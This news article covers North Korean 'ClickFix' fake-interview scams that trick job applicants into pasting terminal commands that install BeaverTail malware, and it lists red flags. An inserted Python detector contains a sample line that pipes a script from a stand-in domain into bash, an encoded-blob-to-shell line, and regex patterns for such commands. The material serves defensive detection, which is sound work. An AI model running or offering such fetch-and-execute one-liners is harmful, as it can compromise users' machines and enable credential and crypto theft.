Reports Emerge That North Korean Hackers Are Expanding Their Malware Methods

24-Sep-2025

For years, the Democratic People’s Republic of Korea (DPRK or North Korea) “Contagious Interview” campaign relied on fake developer job postings to lure targets into running malware like BeaverTail and InvisibleFerret. It has recently evolved. 

The DPRK government hacking collective, known by codenames including Lazarus and Hidden Cobra, has for several years targeted crypto companies, protocols, and holders for theft. It is behind some of the largest crypto heists in history, but is also known for casting a wide net with a variety of hacking methods, targeting big and little fish alike. It has become well known for a malware-delivery operation aimed at victims looking for jobs at crypto companies. Once a victim is duped into applying for a fake job, the trap is set.

Victims were tricked into uploading a fake “introductory video” and, after encountering a staged microphone error, were told to paste a “quick fix” command into their terminal. That command quietly delivered malware that gave attackers remote access and let them siphon sensitive data and crypto funds.

But in late May 2025, researchers observed a major shift. According to GitLab security researcher Oliver Smith, the ClickFix variant now uses the same technique to target cryptocurrency trader roles, marketing and sales positions at Web3 organizations, and even staff at a U.S. e-commerce retailer.

This means non-technical employees — people far less likely to suspect a terminal “fix” command — are now firmly in the hackers’ crosshairs.

How to Spot the New “ClickFix Interview” Scam

Unlike older lures, ClickFix targets people with interview tasks like uploading files or joining a call. When the system generates a fake microphone or camera error, victims are told to paste a short terminal command as a “solution.” That one step silently installs BeaverTail malware, which enables full device compromise and crypto theft. 

Red Flags to Watch For:

  • Interview tasks requiring terminal commands.
  • Requests to disable or “fix” audio/video drivers during calls.
  • Repeated urging to install one-off scripts from unfamiliar domains.
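As an added defensive illustration, not taken from the original article or from any of the vendors it cites, the Python below scans constructed shell-history-style lines for the pattern the red flags describe: a pasted one-liner that fetches a script from an unfamiliar domain and pipes it straight into an interpreter, or decodes an encoded blob into a shell. The trusted-domain allowlist, the sample lines, and the detection heuristics are assumptions, not indicators from any real incident.

```python
import re
from urllib.parse import urlparse

# Assumed allowlist of hosts an organisation expects install scripts to come from.
TRUSTED_DOMAINS = {"github.com", "raw.githubusercontent.com", "pypi.org"}

# Interpreters that execute whatever is piped into them.
INTERPRETERS = r"(?:sh|bash|zsh|python3?|node|osascript)"

# "curl ... | bash" style: download piped directly into an interpreter.
PIPE_TO_SHELL = re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?" + INTERPRETERS + r"\b")
# "base64 -d | sh" style: an encoded blob decoded straight into an interpreter.
DECODE_TO_SHELL = re.compile(r"base64\s+(?:-d|--decode)[^|]*\|\s*" + INTERPRETERS + r"\b")
URL = re.compile(r"https?://[^\s|;]+")


def classify_command(cmd: str) -> list:
    """Return the red flags raised by one command line (empty list if none)."""
    flags = []
    if PIPE_TO_SHELL.search(cmd):
        flags.append("pipe-to-shell")
    if DECODE_TO_SHELL.search(cmd):
        flags.append("decode-to-shell")
    for url in URL.findall(cmd):
        host = urlparse(url).hostname or ""
        if host and host not in TRUSTED_DOMAINS:
            flags.append(f"unfamiliar-domain:{host}")
    return flags


def scan_log(lines):
    """Return (line_number, command, flags) for every line that raises at least one flag."""
    hits = []
    for n, line in enumerate(lines, 1):
        flags = classify_command(line)
        if flags:
            hits.append((n, line, flags))
    return hits


# Constructed sample of shell-history lines; the "interview fix" entries are invented.
SAMPLE_LOG = [
    "git pull origin main",
    "npm install",
    "curl -fsSL https://example-interview-fix.invalid/fix.sh | bash",
    "echo aGVsbG8= | base64 -d | sh",
    "curl -fsSL https://raw.githubusercontent.com/org/repo/main/setup.sh -o setup.sh",
]

if __name__ == "__main__":
    for n, cmd, flags in scan_log(SAMPLE_LOG):
        print(f"line {n}: {flags}\n    {cmd}")
```

The heuristics are deliberately narrow; in practice the same logic would run over EDR process-creation events rather than a shell history file.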

This new wave of attacks is dangerous because it shows:

  • Extending targets: With marketing and sales staff targeted, attackers exploit roles with weaker security habits.
  • Direct investor targeting: GitLab observed phishing tied to “invitations to invest at a Web3 organization”, suggesting retail investors themselves may also be lured.

What the Malware Now Does (and to Whom)

BeaverTail functions as a downloader/infostealer that can harvest browser-stored credentials and cryptocurrency wallet data and then pull down InvisibleFerret, a Python backdoor for persistence and remote control. Palo Alto Networks’ Unit 42 has tracked a Qt-based, cross-platform BeaverTail build and documented targeting of 13 crypto wallet extensions.

The broader cluster—linked to Lazarus and related DPRK activity—has also abused open-source registries. Datadog Security Labs tied malicious npm packages to BeaverTail within the Contagious Interview ecosystem. Sekoia’s March 2025 reporting describes a “ClickFake Interview” variant that deploys backdoors on both Windows and macOS while shifting targets beyond developers.

Why This Matters to Crypto Teams and Investors

DPRK’s crypto operations are not theoretical. In February 2025, the FBI issued a PSA attributing the $1.5 billion Bybit theft to DPRK actors known as TraderTraitor, underscoring the scale and sophistication of state-directed financial cybercrime. 

The U.S. government has long warned the crypto sector about DPRK tradecraft (e.g., CISA AA22-108A), and OFAC maintains sanctions on DPRK cyber units and facilitators. 

For Web3 employers, the target profile expansion (marketing, sales, trading) widens the attack surface to teams that may lack secure-coding instincts or hardened dev environments. For individuals, the one-liner “fix” during a live interview remains a potent social-engineering trick—especially when paired with compiled payloads that avoid interpreter dependencies and some detections. 

Conclusion: From Targeted Developers to Mass Risk

The latest findings show North Korea’s hacker units are not standing still. They are expanding beyond developers, refining their malware with ClickFix lures, and sustaining activity by rapidly replacing their infrastructure.  

For the crypto industry, the lesson is clear: security is no longer just an IT problem. Every employee, every applicant, and even investors themselves are potential targets. Organizations that fail to adapt their defenses risk becoming the next headline.
